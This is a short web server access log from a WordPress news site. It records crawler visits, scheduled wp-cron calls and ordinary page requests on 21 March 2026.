216.180.246.241 - - [21/Mar/2026:10:00:52 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)"
216.180.246.241 - - [21/Mar/2026:10:00:56 +0800] "GET / HTTP/1.1" 200 34809 "http://36.133.115.36/" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)"
36.133.115.36 - - [21/Mar/2026:10:14:54 +0800] "POST /wp-cron.php?doing_wp_cron=1774059294.7608759403228759765625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
89.42.231.241 - - [21/Mar/2026:10:14:55 +0800] "GET / HTTP/1.1" 200 157185 "-" "Mozilla/5.0"
36.133.115.36 - - [21/Mar/2026:10:22:05 +0800] "POST /wp-cron.php?doing_wp_cron=1774059725.5059170722961425781250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
119.116.56.231 - - [21/Mar/2026:10:22:05 +0800] "GET /2160/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"
119.116.56.231 - - [21/Mar/2026:10:22:08 +0800] "GET /news/2160 HTTP/1.1" 200 25830 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"
36.133.115.36 - - [21/Mar/2026:10:22:10 +0800] "POST /wp-cron.php?doing_wp_cron=1774059730.3978419303894042968750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
111.132.9.82 - - [21/Mar/2026:10:22:10 +0800] "GET /2160/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"
111.132.9.82 - - [21/Mar/2026:10:22:10 +0800] "GET /news/2160 HTTP/1.1" 200 25854 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"
130.12.180.15 - - [21/Mar/2026:10:36:01 +0800] "GET / HTTP/1.1" 200 35249 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0"
36.133.115.36 - - [21/Mar/2026:10:53:52 +0800] "POST /wp-cron.php?doing_wp_cron=1774061632.8331670761108398437500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.164.195.17 - - [21/Mar/2026:10:53:52 +0800] "GET / HTTP/1.1" 200 34808 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [21/Mar/2026:11:01:08 +0800] "POST /wp-cron.php?doing_wp_cron=1774062068.4361588954925537109375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
183.143.158.119 - - [21/Mar/2026:11:01:08 +0800] "GET http://cqqizhou.com/2162/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
183.143.158.119 - - [21/Mar/2026:11:01:09 +0800] "GET http://cqqizhou.com/news/2162 HTTP/1.1" 200 21604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
